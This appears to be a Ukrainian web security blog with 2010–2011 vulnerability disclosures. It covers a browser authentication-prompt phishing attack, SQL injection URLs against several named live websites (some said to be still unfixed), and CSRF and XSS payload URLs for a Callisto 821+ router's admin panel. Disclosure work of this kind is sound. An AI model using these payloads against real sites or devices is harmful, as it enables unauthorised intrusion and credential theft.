Websecurity - Веб безпека

26.03.2011

Ще 06.02.2008 я виявив URL Spoofing уразливість в Mozilla Firefox, Internet Explorer, Google Chrome та Opera (спочатку в Mozilla та Internet Explorer, а вже потім протестував в Chrome, Opera та нових версіях Firefox та IE, коли поставив собі ці браузери). Інші браузери без сумніву також уразливі. Про що найближчим часом повідомлю розробникам.

Дану уразливість я виявив коли досліджував вбудований CSRF в Mozilla та Firefox. Атаку я назвав Onsite phishing (Inline phishing). Вона може бути використана (в тому числі фішерами) для викрадення облікових даних користувачів веб сайтів.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам браузерів.

21.07.2011

Дана атака на браузери може використовуватися (в тому числі фішерами) для викрадення логінів і паролів користувачів сайтів.

Як я протестував, багато різних методів (з використанням тегів і CSS), що дозволяють робити міжсайтові запити, може бути використано для проведення даної атаки. Окрім префетчінга (у всіх браузерах на движку Gecko, що пітримують функцію prefetching), що не виводить вікно аутентифікації при отриманні 401 відповіді від веб сервера. Наступні методи можуть бути використані:

Теги img, script, iframe, frame, embed, link (css) - Mozilla, Firefox, IE, Google Chrome та Opera.
Тег object - Internet Explorer, Google Chrome та Opera.
CSS (inline, в html файлах, в зовнішніх css файлах): такі як -moz-binding:url - Mozilla та Firefox < 3.0, такі як background-image:url - в усіх браузерах.

Ось скріншоти атаки на різні браузери (в Firefox 3.0.19, 3.5.x, 3.6.x. 4.0b2 діалогове вікно виглядає майже однаково):

Attack on Mozilla
Attack on Firefox
Attack on IE6
Attack on IE7
Attack on IE8
Attack on Chrome
Attack on Opera

Атака може бути зроблена як відбита (reflected) на цільовому сайті, так і постійна (persistent), з використанням дозволеного функціонала на цільовому сайті, який дозволяє розміщувати деякі теги, наприклад, тег img. Persistent атака є більш небезпечною (і саме цей тип атаки показаний на скріншотах).

Уразливі Mozilla Firefox, Internet Explorer, Google Chrome, Opera та всі інші браузери, що підтримують Basic/Digest Authentication (а це всі сучасні та більшість старих браузерів).

В березні, після мого увідомлення, Mozilla відкрила Bug 647010 в Bugzilla для цієї уразливості.

І лише Мозіла з чотирьох розробників браузерів, яким я повідомив, заявила, що вони планують виправити цю дірку (але не уточнюючи коли саме). Той же Гугл мені навіть не відповів, але в середині червня представники компанії Google заявили в своєму блозі, що в браузерах Chrome 13 і вище (а минулого місяця вийшла 12 версія, а 13 знаходиться у стані бета версії) вони виправили дану уразливість. Шляхом заборони виведення вікна аутентифікації для ресурсів з інших доменів.

Подібна несерйозна поведінка Гугла є ламерською, коли виправляють дірки втихаря, не відповівши і не подякувавши людині, яка про них повідомила. Не поважаю компанії з такою поведінкою. І з такими випадками я вже стикався в минулі роки від Mozilla, Microsoft та Opera, тому нічого нового - типова ламерська поведінка виробників браузерів. Але цей крок Google має стимулювати інших виробників браузерів виправити дану уразливість в своїх продуктах.

В даній добірці уразливості в веб додатках:

• HP Data Protector Backup Client Service EXEC_BAR Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in WonderCMS (деталі)
• Hewlett-Packard Data Protector Cell Manager Service Authentication Bypass Vulnerability (деталі)
• SQL Injection in phpMySport (деталі)
• Hewlett-Packard Data Protector Client EXEC_SETUP Remote Code Execution Vulnerability (деталі)
• SQL Injection in phpMySport (деталі)
• Hewlett-Packard Data Protector Client EXEC_CMD Perl Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in PHP MicroCMS (деталі)
• Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Remote Code Execution Vulnerability (деталі)
• Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability (деталі)

18.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на сайті http://domkomplekt.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

20.07.2011

SQL Injection:

http://domkomplekt.com/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

16.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на сайті http://www.mediakit.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.07.2011

SQL Injection:

http://www.mediakit.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• HP Data Protector Backup Client Service stutil Message Processing Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in F3Site (деталі)
• HP Data Protector Backup Client Service EXEC_INTEGUTIL Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in F3Site (деталі)
• HP Data Protector Backup Client Service EXEC_SCRIPT Remote Code Execution Vulnerability (деталі)
• XSRF (CSRF) in F3Site (деталі)
• HP Data Protector Backup Client Service GET_FILE Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in F3Site (деталі)
• Check Point Endpoint Security Server Information Disclosure (деталі)
• XSS vulnerability in F3Site (деталі)

15.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на сайті http://shtormovoe.kiev.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

18.07.2011

SQL Injection:

http://shtormovoe.kiev.ua/index.php?content_id=-1%20or%20version()%3E4

Зараз дана уразливість вже не працює. Тому що адміни змінили движок - один дірявий на інший дірявий.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

В розділі LAN connection: Ethernet routed (http://192.168.1.1/configuration/lan_create_service.html?
EmWeb_ns:vim:3=/configuration/lan_ether_routed.html) через CSRF можна додати конекшен.

В розділі LAN connection: Ethernet bridged (http://192.168.1.1/configuration/lan_create_service.html?
EmWeb_ns:vim:3=/configuration/lan_ether_bridged.html) через CSRF можна додати конекшен.

В розділі LAN connections (http://192.168.1.1/configuration/lan.html) фунціонал редагування та видалення конекшенів явно також уразливий до CSRF. Але так як в моєму модемі фунціонал створення конекшенів працював некоректно (не можна було їх створити), то не було змоги це перевірити.

XSS:

В вищезгаданих функціоналах багато persistent XSS уразливостей.

http://192.168.1.1/configuration/lan_create_service.html?EmWeb_ns:vim:9=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/lan_create_service.html?EmWeb_ns:vim:10=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/lan_create_service.html?EmWeb_ns:vim:11=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/lan_create_service.html?EmWeb_ns:vim:15=%3Cscript%3Ealert(document.cookie)%3C/script%3E

А також атаки через імена параметрів (коли XSS код задається в імені параметра), про що я писав раніше.

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html.

В розділі LAN connection: Ethernet routed (http://192.168.1.1/configuration/lan_create_service.html?
EmWeb_ns:vim:3=/configuration/lan_ether_routed.html) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості (включаючи XSS атаки через імена параметрів).

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html. А у випадку деяких полів XSS код спрацює на сторінці http://192.168.1.1/configuration/lan.html.

В розділі LAN connection: Ethernet bridged (http://192.168.1.1/configuration/lan_create_service.html?
EmWeb_ns:vim:3=/configuration/lan_ether_bridged.html) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості (включаючи XSS атаки через імена параметрів).

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html. А у випадку деяких полів XSS код спрацює на сторінці http://192.168.1.1/configuration/lan.html.

В даній добірці уразливості в веб додатках:

• HP Data Protector Backup Client Service GET_FILE Directory Traversal Vulnerability (деталі)
• HP Data Protector Backup Client Service bm Message Processing Remote Code Execution Vulnerability (деталі)
• Path disclousure in phpMySport (деталі)
• SQL Injection in phpMySport (деталі)
• HP Data Protector Backup Client Service omniiaputil Message Processing Remote Code Execution Vulnerability (деталі)
• HP Data Protector Backup Client Service HPFGConfig Remote Code Execution Vulnerability (деталі)
• SQL Injection in Phenotype CMS (деталі)
• Huawei HG default WEP/WPA generator (деталі)
• SQL Injection in Phenotype CMS (деталі)
• XSRF (CSRF) in PHP MicroCMS (деталі)

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

Дана уразливість дозволяє очистити логи подій.

Callisto 821+ CSRF15.html

XSS:

http://192.168.1.1/system/events.html?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (persistent):

POST запит на сторінці http://192.168.1.1/system/events.html. XSS код потрібно задати в імені параметра (після крапки). Уразливі наступні параметри: EmWeb_ns:vim:2., EmWeb_ns:vim:7., EmWeb_ns:vim:11., EmWeb_ns:vim:12., EmWeb_ns:vim:13., EmWeb_ns:vim:14., EmWeb_ns:vim:15.

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html.

До такої persistent XSS уразливості через ім’я параметра вразливий майже весь функціонал адмінки (той, що працює через POST). Про деякі подібні дірки через довільні параметри в інших розділах адмінки я вже писав раніше.

14.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на сайті http://pmk6.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.07.2011

SQL Injection:

http://pmk6.com.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.